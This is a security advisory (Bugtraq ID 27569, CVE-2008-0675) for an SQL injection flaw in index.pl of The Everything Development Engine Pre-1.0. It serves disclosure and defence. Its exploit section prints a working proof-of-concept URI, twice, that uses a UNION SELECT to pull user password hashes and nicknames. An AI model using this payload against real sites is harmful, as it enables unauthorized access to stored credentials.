The Everything Development Engine 'index.pl SQL Injection Vulnerability
BID:27569
Info
The Everything Development Engine 'index.pl SQL Injection Vulnerability
| Bugtraq ID: | 27569 |
| Class: | Input Validation Error |
| CVE: |
CVE-2008-0675 |
| Remote: | Yes |
| Local: | No |
| Published: | Feb 02 2008 12:00AM |
| Updated: | May 07 2015 05:33PM |
| Credit: | sub <[email protected]> discovered this vulnerability. |
| Vulnerable: |
The Everything Development Company The Everything Development Engine Pre-1.0 |
| Not Vulnerable: | |
Discussion
The Everything Development Engine 'index.pl SQL Injection Vulnerability
The Everything Development Engine is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
The issue affects The Everything Development Engine Pre-1.0; other versions may also be vulnerable.
The Everything Development Engine is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
The issue affects The Everything Development Engine Pre-1.0; other versions may also be vulnerable.
Exploit / POC
The Everything Development Engine 'index.pl SQL Injection Vulnerability
An attacker can exploit this issue via a browser.
The following proof-of-concept URI is available:
http://www.example.com/cms/index.pl?node_id=0/**/UNION/**/SELECT/**/null,101,null,1,null,null,passwd,null,null,nick,null/**/FROM/**/user/**/WHERE/**/nick/**/!%3d/**/''/**/%23
An attacker can exploit this issue via a browser.
The following proof-of-concept URI is available:
http://www.example.com/cms/index.pl?node_id=0/**/UNION/**/SELECT/**/null,101,null,1,null,null,passwd,null,null,nick,null/**/FROM/**/user/**/WHERE/**/nick/**/!%3d/**/''/**/%23
Solution / Fix
The Everything Development Engine 'index.pl SQL Injection Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
The Everything Development Engine 'index.pl SQL Injection Vulnerability
References:
References:
- The Everything Development Engine Product Page (The Everything Development Company)
- The Everything Development System - SQL Injection (sub )